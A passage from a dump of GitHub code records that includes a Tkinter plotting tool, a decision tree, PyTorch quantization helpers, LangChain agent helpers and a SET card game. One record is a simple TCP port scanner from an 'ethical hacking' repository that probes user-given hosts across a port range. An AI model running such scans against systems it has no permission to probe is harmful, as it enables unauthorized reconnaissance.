ttk.Notebook(exp)\r\n tab1 = ttk.Frame(tab_ctrl)\r\n tk.Label(tab1, text='Reihenname: ').grid(column=0, row=0, sticky='W')\r\n e1 = tk.Entry(tab1, width=30)\r\n e1.grid(column=1, row=0)\r\n tk.Label(tab1, text='Neuer Reihenfilter: ').grid(column=0, row=1, sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=28, command=lambda: self.add(e1.get(), tab_ctrl)).grid(column=1, row=1, sticky='W')\r\n tab_ctrl.add(tab1, text='+')\r\n for ser in self.series:\r\n self.add(ser, tab_ctrl, False)\r\n tab_ctrl.pack(expand=1, fill=\"both\")\r\n self.is_open = True\r\n\r\n\r\nclass Scatter3DWindow(tk.Frame):\r\n scaler = MinMaxScaler((0, 20))\r\n c_scaler = MinMaxScaler((0, 1))\r\n\r\n def __get_filters(self):\r\n if len(self.series.series):\r\n return self.series.series\r\n return [None]\r\n\r\n def __get_columns(self, ser=None):\r\n if ser:\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.z_vals, self.c_vals, self.s_vals, filter=ser)\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.z_vals, self.c_vals, self.s_vals)\r\n\r\n def update(self):\r\n if self.x_vals and self.y_vals and self.z_vals:\r\n self.ax.cla()\r\n self.ax.set_xlabel(self.x_vals)\r\n self.ax.set_ylabel(self.y_vals)\r\n self.ax.set_zlabel(self.z_vals)\r\n self.ax._custom_label_data = {}\r\n markers = ['o', 'v', '^', '<', '>', '1', '2', '3', '4', '*', 'P', 'p', 's', 'X', 'D']\r\n if self.s_vals:\r\n s = Dataset.get_columns(self.s_vals)[0]\r\n self.scaler.fit(s.to_numpy().reshape(-1,1))\r\n for ser, marker in zip(self.__get_filters(), cycle(markers)):\r\n x, y, z, c, s, v, i = self.__get_columns(ser)\r\n title = \"All\"\r\n if ser:\r\n title = ser.title\r\n if c is not None:\r\n c = self.c_scaler.fit_transform(c.to_numpy().reshape(-1,1))\r\n if self.s_vals:\r\n col = self.ax.scatter(xs=x, ys=y, zs=z, c=c, s=self.scaler.transform(s.to_numpy().reshape(-1, 1)), marker=marker, label=title)\r\n else:\r\n col = self.ax.scatter(xs=x, ys=y, zs=z, c=c, marker=marker, label=title)\r\n self.ax._custom_label_data[col] = (v, i)\r\n self.ax.legend()\r\n self.ax.set_title(self.title)\r\n plt.show(block=False)\r\n\r\n def x_changed(self, event):\r\n self.x_vals = event.widget.get()\r\n self.update()\r\n\r\n def y_changed(self, event):\r\n self.y_vals = event.widget.get()\r\n self.update()\r\n\r\n def z_changed(self, event):\r\n self.z_vals = event.widget.get()\r\n self.update()\r\n\r\n def color_changed(self, event):\r\n self.c_vals = event.widget.get()\r\n if self.c_vals == 'None':\r\n self.c_vals = None\r\n self.update()\r\n\r\n def scale_changed(self, event):\r\n self.s_vals = event.widget.get()\r\n if self.s_vals == 'None':\r\n self.s_vals = None\r\n self.update()\r\n\r\n def err_changed(self, event):\r\n self.e_vals = event.widget.get()\r\n if self.e_vals == 'None':\r\n self.e_vals = None\r\n self.update()\r\n\r\n def __init__(self, parent, p_ax, title):\r\n tk.Frame.__init__(self, parent)\r\n self.ax = p_ax\r\n self.title = title\r\n self.x_vals = None\r\n self.y_vals = None\r\n self.z_vals = None\r\n self.c_vals = None\r\n self.s_vals = None\r\n self.e_vals = None\r\n self.series = SeriesManager(self)\r\n\r\n ttk.Label(self, text=\"X Parameter: \").grid(column=0, row=0, sticky='W')\r\n cb1 = ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb1.bind('<>', self.x_changed)\r\n cb1.grid(column=1, row=0)\r\n\r\n ttk.Label(self, text=\"Y Parameter: \").grid(column=0, row=1, sticky='W')\r\n cb2 = ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb2.bind('<>', self.y_changed)\r\n cb2.grid(column=1, row=1)\r\n\r\n ttk.Label(self, text=\"Z Ergebnis: \").grid(column=0, row=2, sticky='W')\r\n cb3 = ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb3.bind('<>', self.z_changed)\r\n cb3.grid(column=1, row=2)\r\n\r\n ttk.Label(self, text=\"Fehlerbalken: \").grid(column=0, row=3, sticky='W')\r\n cb_4 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb_4.bind('<>', self.err_changed)\r\n cb_4.set('None')\r\n cb_4.grid(column=1, row=3)\r\n\r\n ttk.Label(self, text=\"Farbwert: \").grid(column=0, row=4, sticky='W')\r\n cb5 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb5.bind('<>', self.color_changed)\r\n cb5.set('None')\r\n cb5.grid(column=1, row=4)\r\n\r\n ttk.Label(self, text=\"Größenwert: \").grid(column=0, row=5, sticky='W')\r\n cb6 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb6.bind('<>', self.scale_changed)\r\n cb6.set('None')\r\n cb6.grid(column=1, row=5)\r\n\r\n ttk.Label(self, text=\"Reihenmanager: \").grid(column=0, row=6, sticky='W')\r\n tk.Button(self, text=\"Datenfilter\", width=28, command=lambda: self.series.open()).grid(column=1, row=6)\r\n\r\n\r\nclass Scatter2DWindow(tk.Frame):\r\n scaler = MinMaxScaler((0, 20))\r\n\r\n def __get_filters(self):\r\n if len(self.series.series):\r\n return self.series.series\r\n return [None]\r\n\r\n def __get_columns(self, ser=None):\r\n if ser:\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.c_vals, self.s_vals, filter=ser)\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.c_vals, self.s_vals)\r\n\r\n def update(self):\r\n if self.x_vals and self.y_vals:\r\n self.ax.cla()\r\n self.ax.set_xlabel(self.x_vals)\r\n self.ax.set_ylabel(self.y_vals)\r\n self.ax._custom_label_data = {}\r\n markers = ['o', 'v', '^', '<', '>', '1', '2', '3', '4', '*', 'P', 'p', 's', 'X', 'D']\r\n if self.s_vals:\r\n s = Dataset.get_columns(self.s_vals)[0]\r\n self.scaler.fit(s.to_numpy().reshape(-1,1))\r\n for ser, marker in zip(self.__get_filters(), cycle(markers)):\r\n x, y, c, s, v, i = self.__get_columns(ser)\r\n title = \"All\"\r\n if ser:\r\n title = ser.title\r\n if self.s_vals:\r\n col = self.ax.scatter(x=x, y=y, c=c, s=self.scaler.transform(s.to_numpy().reshape(-1, 1)), marker=marker, label=title)\r\n else:\r\n col = self.ax.scatter(x=x, y=y, c=c, marker=marker, label=title)\r\n self.ax._custom_label_data[col] = (v, i)\r\n self.ax.legend()\r\n self.ax.set_title(self.title)\r\n plt.show(block=False)\r\n\r\n def x_changed(self, event):\r\n self.x_vals = event.widget.get()\r\n self.update()\r\n\r\n def y_changed(self, event):\r\n self.y_vals = event.widget.get()\r\n self.update()\r\n\r\n def color_changed(self, event):\r\n self.c_vals = event.widget.get()\r\n if self.c_vals == 'None':\r\n self.c_vals = None\r\n self.update()\r\n\r\n def scale_changed(self, event):\r\n self.s_vals = event.widget.get()\r\n if self.s_vals == 'None':\r\n self.s_vals = None\r\n self.update()\r\n\r\n def err_changed(self, event):\r\n self.e_vals = event.widget.get()\r\n if self.e_vals == 'None':\r\n self.e_vals = None\r\n self.update()\r\n\r\n def __init__(self, parent, p_ax, title):\r\n tk.Frame.__init__(self, parent)\r\n self.ax = p_ax\r\n self.title = title\r\n self.x_vals = None\r\n self.y_vals = None\r\n self.c_vals = None\r\n self.s_vals = None\r\n self.e_vals = None\r\n self.series = SeriesManager(self)\r\n\r\n ttk.Label(self, text=\"X Parameter: \").grid(column=0, row=0, sticky='W')\r\n cb1 = ttk.Combobox(self, values=Dataset.get_numerical_columns() + Dataset.get_categorical_columns(), width=30)\r\n cb1.bind('<>', self.x_changed)\r\n cb1.grid(column=1, row=0)\r\n\r\n ttk.Label(self, text=\"Y Parameter: \").grid(column=0, row=1, sticky='W')\r\n cb2 = ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb2.bind('<>', self.y_changed)\r\n cb2.grid(column=1, row=1)\r\n\r\n ttk.Label(self, text=\"Fehlerbalken: \").grid(column=0, row=2, sticky='W')\r\n cb_4 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb_4.bind('<>', self.err_changed)\r\n cb_4.set('None')\r\n cb_4.grid(column=1, row=2)\r\n\r\n ttk.Label(self, text=\"Farbwert: \").grid(column=0, row=3, sticky='W')\r\n cb5 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb5.bind('<>', self.color_changed)\r\n cb5.set('None')\r\n cb5.grid(column=1, row=3)\r\n\r\n ttk.Label(self, text=\"Größenwert: \").grid(column=0, row=4, sticky='W')\r\n cb6 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb6.bind('<>', self.scale_changed)\r\n cb6.set('None')\r\n cb6.grid(column=1, row=4)\r\n\r\n ttk.Label(self, text=\"Reihenmanager: \").grid(column=0, row=5, sticky='W')\r\n tk.Button(self, text=\"Datenfilter\", width=28, command=lambda: self.series.open()).grid(column=1, row=5)\r\n\r\n\r\nclass HistogramWindow:\r\n def __init__(self):\r\n pass\r\n\r\n\r\nclass BarPlotWindow:\r\n def __init__(self):\r\n pass\r\n\r\n\r\nclass Filtertool:\r\n figures = []\r\n\r\n def __hover(self, evnt):\r\n if evnt.inaxes is None:\r\n return\r\n text = \"\"\r\n for idx, col in enumerate(evnt.inaxes.collections):\r\n cont, ind = col.contains(evnt)\r\n if cont:\r\n tup = evnt.inaxes._custom_label_data[col]\r\n text += str(pd.concat([tup[0], tup[1]], axis=1).iloc[ind['ind']])\r\n if text == \"\":\r\n return\r\n print(text)\r\n\r\n def __cb(self):\r\n pass\r\n\r\n def add_2d_scatter(self, notebook, title):\r\n n = len(self.figure.axes)\r\n x = (math.floor(math.sqrt(n))+1)\r\n gs = gridspec.GridSpec(nrows=x, ncols=x, figure=self.figure)\r\n for i, ax in enumerate(self.figure.axes):\r\n pos = gs[i // x, i % x].get_position(self.figure)\r\n ax.set_position(pos)\r\n ax.set_subplotspec(gs[i])\r\n ax = self.figure.add_subplot(gs[n // x, n % x])\r\n if len(title) == 0:\r\n title = \"2D Scatter\"\r\n title = f\"{title} {len(Filtertool.figures)}\"\r\n tab = Scatter2DWindow(notebook, ax, title)\r\n Filtertool.figures.append(tab)\r\n notebook.add(tab, text=title)\r\n plt.show()\r\n\r\n def add_3d_scatter(self, notebook, title):\r\n n = len(self.figure.axes)\r\n x = (math.floor(math.sqrt(n))+1)\r\n gs = gridspec.GridSpec(nrows=x, ncols=x, figure=self.figure)\r\n for i, ax in enumerate(self.figure.axes):\r\n pos = gs[i // x, i % x].get_position(self.figure)\r\n ax.set_position(pos)\r\n ax.set_subplotspec(gs[i])\r\n ax = self.figure.add_subplot(gs[n // x, n % x], projection='3d')\r\n if len(title) == 0:\r\n title = \"3D Scatter\"\r\n title = f\"{title} {len(Filtertool.figures)}\"\r\n tab = Scatter3DWindow(notebook, ax, title)\r\n Filtertool.figures.append(tab)\r\n notebook.add(tab, text=title)\r\n plt.show()\r\n\r\n def __init__(self, fig):\r\n self.figure = fig\r\n # fig.canvas.mpl_connect(\"motion_notify_event\", self.__hover)\r\n\r\n self.exp = tk.Toplevel(self.figure.canvas.get_tk_widget())\r\n self.exp.title(\"Dora the Explorer\")\r\n self.exp.geometry(\"300x200\")\r\n self.exp.protocol(\"WM_DELETE_WINDOW\", self.__cb)\r\n tab_ctrl = ttk.Notebook(self.exp)\r\n for tab in Filtertool.figures:\r\n print(tab.title)\r\n\r\n tab1 = ttk.Frame(tab_ctrl)\r\n tk.Label(tab1, text='Titel: ').grid(column=0, row=0, sticky='W')\r\n e1 = tk.Entry(tab1, width=30)\r\n\r\n tk.Label(tab1, text='2D Scatter Plot: ').grid(column=0, row=1, sticky='W')\r\n b0 = tk.Button(tab1, text=\"Add\", width=30, command=lambda: self.add_2d_scatter(tab_ctrl, e1.get()))\r\n b0.grid(column=1, row=1, sticky='W')\r\n\r\n tk.Label(tab1, text='3D Scatter Plot: ').grid(column=0, row=2, sticky='W')\r\n b1 = tk.Button(tab1, text=\"Add\", width=30, command=lambda: self.add_3d_scatter(tab_ctrl, e1.get()))\r\n b1.grid(column=1, row=2, sticky='W')\r\n\r\n tk.Label(tab1, text='Histogram: ').grid(column=0, row=3, sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=30).grid(column=1, row=3, sticky='W')\r\n\r\n tk.Label(tab1, text='Bar Plot: ').grid(column=0, row=4, sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=30).grid(column=1, row=4, sticky='W')\r\n\r\n tk.Label(tab1, text='Boxplot: ').grid(column=0, row=5, sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=30).grid(column=1, row=5, sticky='W')\r\n\r\n e1.grid(column=1, row=0)\r\n\r\n tab_ctrl.add(tab1, text='+')\r\n tab_ctrl.pack(expand=1, fill=\"both\")\r\n\r\n\r\nif __name__ == '__main__':\r\n fig = plt.figure(constrained_layout=True)\r\n data = Dataset()\r\n controll_panel = Filtertool(fig)\r\n plt.show()\r\n\r\n","repo_name":"LabC0de/DorPHA","sub_path":"Refrac.py","file_name":"Refrac.py","file_ext":"py","file_size_in_byte":23158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41292972497","text":"# this tool is same like a nmap to scan port hosting sites\r\nimport socket\r\n\r\ntargets = input(\"[*] Enter target to scan (split them with ,)\")\r\nports = int(input(\"[*] Enter how many ports you want to scan \"))\r\n\r\n\r\ndef scan_port(ipaddress, port):\r\n try:\r\n # socket/post ae those that host a website\r\n sock = socket.socket()\r\n # sock to conect needs two parameter\r\n sock.connect((ipaddress, port))\r\n # if we manage to connect then the port is open and if we dont then the port is closed\r\n print(\"[+] Port Open \" + str(port))\r\n socket.close()\r\n except:\r\n print(\"[-] Port Close \" + str(port))\r\n\r\n\r\ndef scan(target, ports):\r\n for port in range(1, ports):\r\n scan_port(target, port)\r\n\r\n\r\nif ',' in targets:\r\n # if multiple targets are to scan\r\n for ipadd in targets.split(','):\r\n scan(ipadd.strip(' '), ports)\r\nelse:\r\n scan(targets, ports)\r\n","repo_name":"SKAZIPSY/pythonEthicalHacking","sub_path":"postscanner.py","file_name":"postscanner.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9429314706","text":"# %%\r\nimport numpy as np\r\nfrom typing import List\r\n\r\n\r\nclass TauTree():\r\n \"\"\"\r\n Attribute\r\n ---------\r\n\r\n tree:\r\n tree of decision rules, (ith dimension, criterion)\r\n go left if Xi < criterion.\r\n (1, 2.2)\r\n / \\ \r\n (0, 8.1) (3, 7.2)\r\n ...\r\n \r\n \r\n \"\"\"\r\n\r\n def __init__(self, depth=4, min_split=2):\r\n self.sgn_matrix = None\r\n self.depth = depth\r\n self.n_split = 2**self.depth - 1 # number of non-leaf nodes in tree\r\n self.min_split = min_split\r\n\r\n def fit(self, X, y):\r\n \"\"\"\r\n X, np.array:\r\n shape = (n, d)\r\n \"\"\"\r\n self.n, self.dim = X.shape\r\n self.sgn_matrix, self.orders = self.precompute(X, y)\r\n self.y = y\r\n \r\n self.tree = [] # list(binary tree) of tuples of (dim to split, stump)\r\n self.leaf_members = [ # list(binary tree) of List[int(id)]\r\n list(range(self.n)) # all belongs to root\r\n ]\r\n\r\n # split every leaf\r\n for leaf_ind in range(self.n_split): # binary tree leaf id\r\n\r\n if not self.can_split(leaf_ind):\r\n self.not_split()\r\n continue\r\n \r\n dim, left, right = self.best_split(\r\n sign_matrix=self.sgn_matrix,\r\n order_list=self.orders,\r\n members=self.leaf_members[leaf_ind]\r\n )\r\n \r\n # found best split for ith leaf...\r\n self.leaf_members.extend( [ left, right ] )\r\n boundary = [ left[-1], right[0] ]\r\n self.tree.append(\r\n ( dim, X[boundary, dim].mean() ) # middle point as stump\r\n )\r\n \r\n \r\n def predict(self, X, estimate_func=np.median, min_df=1):\r\n \r\n estimations = np.array([\r\n ( estimate_func( self.y[leaf_member] ) \r\n if len(leaf_member) >= min_df \r\n else 0 )\r\n for leaf_member in self.leaf_members\r\n ])\r\n\r\n group = np.zeros(X.shape[0], dtype=np.int)\r\n\r\n for leaf_ind, (dim, stump) in enumerate(self.tree):\r\n member = (group == leaf_ind)\r\n val = X[member, dim]\r\n\r\n new_group = np.where(\r\n val < stump, 2*leaf_ind+1, 2*leaf_ind+2\r\n )\r\n new_group[ np.isnan(val) ] = leaf_ind\r\n\r\n group[member] = new_group\r\n\r\n return estimations[group]\r\n\r\n\r\n @staticmethod\r\n def precompute(X, y):\r\n y = np.array(y).reshape(-1, 1)\r\n # equilavent to sgn_matrix = np.sign(y - y.T)\r\n sgn_matrix = (y > y.T).astype(np.int8)\r\n sgn_matrix[y < y.T] = -1\r\n\r\n order_list = [\r\n np.argsort(Xd)\r\n for Xd in X.T\r\n ]\r\n return sgn_matrix, order_list\r\n\r\n\r\n @staticmethod\r\n def best_split(sign_matrix, order_list, members: List[int]):\r\n maximum = -1\r\n # iterate all dimensions\r\n for d, order in enumerate(order_list):\r\n sub_order = order[ np.isin(order, members) ] # subsequence\r\n abs_tau = np.abs(\r\n sign_matrix[np.ix_(sub_order, sub_order)]\r\n .sum(axis=1)\r\n .cumsum()\r\n )\r\n max_tau = abs_tau.max()\r\n if maximum < max_tau:\r\n maximum, dim = max_tau, d\r\n size_left = abs_tau.argmax() + 1\r\n left, right = np.split( sub_order, [size_left] )\r\n\r\n return dim, left, right\r\n\r\n\r\n def can_split(self, leaf_ind):\r\n size = len(self.leaf_members[leaf_ind])\r\n if (size == 0):\r\n return False\r\n elif (self.min_split != None) and (size < self.min_split):\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n def not_split(self):\r\n self.leaf_members.extend( [ [], [] ] )\r\n self.tree.append( None )\r\n","repo_name":"yogacha/Non-parametric-Decision-Tree","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"30432858832","text":"import torch.nn as nn\nimport torch\nimport time \nimport os\nimport csv\n\nclass ModelQuantization(nn.Module):\n def __init__(self,model):\n super(ModelQuantization,self).__init__()\n \n # Inserting a quantization operator before the input\n self.quantstub = torch.quantization.QuantStub()\n \n # Inserting a dequantization operator after the output\n self.dequantstub = torch.quantization.DeQuantStub()\n \n # Original floating point model\n self.model = model\n\n def forward(self, x):\n # Floating values to integer values\n z = self.quantstub(x)\n \n z = self.model(z)\n \n # Integer values to floating values\n z = self.dequantstub(z)\n return z\n \ndef model_calibration(model, data, device):\n \n model = model.to(device)\n model.eval()\n \n for input_values, target_values in data:\n input_values,target_values = input_values.to(device), target_values.to(device)\n \n _ = model(input_values)\n \ndef measure_inference_latency(model,\n device,\n input_size=(1, 3, 32, 32),\n num_samples=100,\n num_warmups=10):\n\n model.to(device)\n model.eval()\n\n x = torch.rand(size=input_size).to(device)\n\n with torch.no_grad():\n for _ in range(num_warmups):\n _ = model(x)\n torch.cuda.synchronize()\n\n with torch.no_grad():\n start_time = time.time()\n for _ in range(num_samples):\n _ = model(x)\n torch.cuda.synchronize()\n end_time = time.time()\n elapsed_time = end_time - start_time\n elapsed_time_ave = elapsed_time / num_samples\n\n return elapsed_time_ave\n\n\n\ndef save_model(model, model_name,cpu_latency,gpu_latency,accuracy, is_quantized):\n # specify the path and name of the saved model\n if is_quantized:\n model_name = f\"{model_name}_quantized.pth\"\n else:\n model_name = f\"{model_name}.pth\"\n model_path = f\"/home/sourav/research_project/{model_name}\"\n\n # save the model\n torch.save(model.state_dict(), model_path)\n\n # get the file size of the model in bytes\n file_size = os.path.getsize(model_path)\n\n # convert the file size to MB\n file_size_mb = file_size / (1024 * 1024)\n\n # print the name, quantization status, and file size in MB\n print(f\"Saved model: {model_name} (Quantized: {is_quantized}), File size: {file_size_mb:.2f} MB\")\n \n \n\ndef save_model_and_stats(model, model_name, cpu_latency, accuracy, is_quantized):\n # specify the path and name of the saved model\n if is_quantized:\n model_name = f\"{model_name}_quantized.pth\"\n else:\n model_name = f\"{model_name}.pth\"\n model_path = f\"/home/sourav/research_project/{model_name}\"\n\n # save the model\n torch.save(model.state_dict(), model_path)\n\n # get the file size of the model in bytes\n file_size = os.path.getsize(model_path)\n\n # convert the file size to MB\n file_size_mb = file_size / (1024 * 1024)\n\n # print the name, quantization status, and file size in MB\n print(f\"Saved model: {model_name} (Quantized: {is_quantized}), File size: {file_size_mb:.2f} MB\")\n\n stats_path = \"/home/sourav/research_project/stats.csv\"\n\n \n # check if the stats.csv file exists, create it if it doesn't exist\n if not os.path.exists(stats_path):\n with open(stats_path, mode=\"w\", newline='') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['Model Name', 'File Size (MB)', 'CPU Latency (ms/sample)', 'Accuracy'])\n\n # append the architecture, model size, latencies, and accuracy to the csv file\n with open(stats_path, mode=\"a\", newline='') as csv_file:\n writer = csv.writer(csv_file)\n model_name_with_quantized = model_name \n writer.writerow([model_name_with_quantized, round(file_size_mb, 2), cpu_latency, accuracy])\n\ndef save_quantized_model(model, model_name, cpu_latency, gpu_latency, accuracy):\n # specify the path and name of the saved model\n model_name = f\"{model_name}_quantized.pth\"\n model_path = f\"/home/sourav/research_project/saved_models/{model_name}\"\n\n # save the quantized model\n torch.save(model.state_dict(), model_path)\n\n # get the file size of the model in bytes\n file_size = os.path.getsize(model_path)\n\n # convert the file size to MB\n file_size_mb = file_size / (1024 * 1024)\n\n # print the name, quantization status, and file size in MB\n print(f\"Saved model: {model_name} (Quantized), File size: {file_size_mb:.2f} MB\")\n\n\ndef measure_latency(model, input_shape):\n input_data = torch.randn(input_shape)\n model.eval() # set model to evaluation mode\n\n # Warm up the model by running it once\n with torch.no_grad():\n _ = model(input_data)\n\n # Measure the inference time\n start_time = time.time()\n with torch.no_grad():\n _ = model(input_data)\n end_time = time.time()\n\n latency = end_time - start_time\n print(f\"Inference latency: {latency:.6f} seconds\")\n return latency","repo_name":"souravrai98/Research-Project","sub_path":"quant.py","file_name":"quant.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"40364524442","text":"import setpath\nimport functions\nimport json\nimport re\nregistered=True\n\n\nclass createderivedcolumns(functions.vtable.vtbase.VT): #uses + and : for multiplication\n def VTiter(self, *parsedArgs,**envars):\n largs, dictargs = self.full_parse(parsedArgs)\n\n if 'query' not in dictargs:\n raise functions.OperatorError(__name__.rsplit('.')[-1],\"No query argument \")\n query = dictargs['query']\n\n if 'newSchema' not in dictargs: # einai to neo sxhma pou tha exei o pinakas.\n raise functions.OperatorError(__name__.rsplit('.')[-1],\"No newSchema \")\n newSchema = str(dictargs['newSchema'])\n newSchema = re.split(',',newSchema)\n\n\n newSchema1 =\"\"\n for i in xrange(len(newSchema)):\n newSchema1 += newSchema[i]+\",\"\n newSchema1=newSchema1[:-1]\n yield ([newSchema1],)\n\n\n\n cur = envars['db'].cursor()\n c=cur.execute(query)\n currentSchema1 = cur.getdescriptionsafe()\n currentSchema =[str(x[0]) for x in currentSchema1]\n\n\n for myrow in c:\n myrowresult =\"\"\n for d in xrange(len(newSchema)):\n colval = 1.0\n if \":\" in newSchema[d]:\n elements = re.split(\":\",newSchema[d])\n else:\n elements = [newSchema[d]]\n item=[]\n for e in xrange(len(elements)):\n colname = elements[e]\n\n myindex = currentSchema.index(str(colname))\n colval = colval * float(myrow[myindex])\n myrowresult+=str(colval)+\",\"\n # print myrow\n # print newSchema\n # print \"result\", myrowresult\n\n\n yield tuple([myrowresult[0:-1]],)\n\n\n\n\ndef Source():\n return functions.vtable.vtbase.VTGenerator(createderivedcolumns)\n\n\nif not ('.' in __name__):\n \"\"\"\n This is needed to be able to test the function, put it at the end of every\n new function you create\n \"\"\"\n import sys\n import setpath\n from functions import *\n testfunction()\n if __name__ == \"__main__\":\n reload(sys)\n sys.setdefaultencoding('utf-8')\n import doctest\n doctest.tes\n\n\n\n","repo_name":"madgik/exareme","sub_path":"Exareme-Docker/src/exareme/exareme-tools/madis/src/functionslocal/vtable/createderivedcolumns.py","file_name":"createderivedcolumns.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"45"} +{"seq_id":"29279655768","text":"# 参考自 https://python.langchain.com/en/latest/use_cases/agent_simulations/characters.html\n\nfrom datetime import datetime, timedelta\nfrom typing import List\n# from termcolor import colored\n\n\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.docstore import InMemoryDocstore\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.retrievers import TimeWeightedVectorStoreRetriever\nfrom langchain.vectorstores import FAISS\n\nfrom langchain.experimental.generative_agents import GenerativeAgent, GenerativeAgentMemory\nimport math\nimport faiss\n\nLLM = ChatOpenAI(max_tokens=1500) # Can be any LLM you want.\n\n\ndef relevance_score_fn(score: float) -> float:\n \"\"\"Return a similarity score on a scale [0, 1].\"\"\"\n # This will differ depending on a few things:\n # - the distance / similarity metric used by the VectorStore\n # - the scale of your embeddings (OpenAI's are unit norm. Many others are not!)\n # This function converts the euclidean norm of normalized embeddings\n # (0 is most similar, sqrt(2) most dissimilar)\n # to a similarity function (0 to 1)\n return 1.0 - score / math.sqrt(2)\n\n\ndef create_new_memory_retriever():\n \"\"\"Create a new vector store retriever unique to the agent.\"\"\"\n # Define your embedding model\n embeddings_model = OpenAIEmbeddings()\n # Initialize the vectorstore as empty\n embedding_size = 1536\n index = faiss.IndexFlatL2(embedding_size)\n vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {},\n relevance_score_fn=relevance_score_fn)\n return TimeWeightedVectorStoreRetriever(vectorstore=vectorstore, other_score_keys=[\"importance\"], k=15)\n\n\ndef create_agent(name, age, traits, status='N/A', init_obs=[], reflection_threshold=8, verbose=False):\n \"\"\"Create a new agent.\"\"\"\n agent_memory = GenerativeAgentMemory(\n llm=LLM,\n memory_retriever=create_new_memory_retriever(),\n verbose=verbose,\n reflection_threshold=reflection_threshold\n # we will give this a relatively low number to show how reflection works\n )\n\n agent = GenerativeAgent(name=name,\n age=age,\n traits=traits, # You can add more persistent traits here\n status=status,\n # When connected to a virtual world, we can have the characters update their status\n memory_retriever=create_new_memory_retriever(),\n llm=LLM,\n memory=agent_memory\n )\n\n agent_add_memory(agent, init_obs)\n return agent\n\n\ndef summery_agent(agent: GenerativeAgent, force_refresh=False):\n print(agent.get_summary(force_refresh=force_refresh))\n\n\ndef agent_add_memory(agent: GenerativeAgent, observations: List[str]):\n for observation in observations:\n agent.memory.add_memory(observation)\n\n\ndef interview_agent(agent: GenerativeAgent, interview_by: str, message: str) -> str:\n # 这个方法会增加agent的记忆\n new_message = f\"{interview_by} says {message}\"\n return agent.generate_dialogue_response(new_message)[1]\n\n\ndef agent_generate_reaction(agent: GenerativeAgent, observation: str) -> str:\n # 这个方法会增加agent的记忆\n _, reaction = agent.generate_reaction(observation)\n return reaction\n\n\ndef run_conversation(agents: List[GenerativeAgent], initial_observation: str) -> None:\n \"\"\"Runs a conversation between agents.\"\"\"\n _, observation = agents[1].generate_reaction(initial_observation)\n print(observation)\n turns = 0\n while True:\n break_dialogue = False\n for agent in agents:\n stay_in_dialogue, observation = agent.generate_dialogue_response(observation)\n print(observation)\n # observation = f\"{agent.name} said {reaction}\"\n if not stay_in_dialogue:\n break_dialogue = True\n if break_dialogue:\n break\n turns += 1\n","repo_name":"HeGanjie/ai-npc-world","sub_path":"server/agent_logic_helper.py","file_name":"agent_logic_helper.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"45"} +{"seq_id":"42000652471","text":"import random\nimport itertools\nimport __builtin__\nimport pygraphviz as pgv\nfrom draw import *\nfrom pygame.locals import *\n\n__builtin__.SET_NUMBER = 3\ncolor_list = ('red', 'green', 'blue')\nsymbol_list = ('diamond', 'squiggle', 'oval')\nshading_list = ('solid', 'striped', 'open')\nnumber_list = ('one', 'two', 'three')\nfeature_list = (color_list, symbol_list, shading_list, number_list)\nfeatures = ('color', 'symbol', 'shading', 'number')\n\ndef deck_generator():\n '''\n Deck generator deck_generator()\n '''\n deck = []\n base = [range(len(feature)) for feature in feature_list]\n tally_counter = itertools.product(*base)\n for value in tally_counter:\n card_features = itertools.imap(lambda f, g: f[g], feature_list, value)\n card = dict([pair for pair in zip(features, card_features)])\n deck.append(card)\n return deck\n\ndef take_cards(deck, counter):\n '''\n Taking cards take_cards(deck, counter)\n '''\n cards = []\n while deck and counter != 0:\n cards.append(deck.pop(-1))\n counter -= 1\n return cards\n\ndef is_set(cards):\n '''\n Set verificaton is_set(cards)\n '''\n if len(cards) != SET_NUMBER: return False\n confirm = True\n for feature in features:\n feature_set = set([])\n for card in cards:\n feature_set |= set([card[feature]])\n if 1 < len(feature_set) < SET_NUMBER:\n confirm = False\n break\n return confirm\n\ndef search_set(cards):\n '''\n Set searching search_set(cards)\n '''\n ids = []\n sets = []\n n = len(cards)\n if n < SET_NUMBER: return sets, ids\n for indexes in itertools.combinations(range(n), SET_NUMBER):\n multiplet = [cards[i] for i in indexes]\n if is_set(multiplet):\n ids.append(indexes)\n sets.append(multiplet)\n return sets, ids\n\ndef copy_cards(cards):\n '''\n Copying cards copy_cards(cards)\n '''\n copied_cards = []\n for card in cards:\n copied_cards.append(card.copy())\n return copied_cards\n\ndef graph_generator(cards):\n 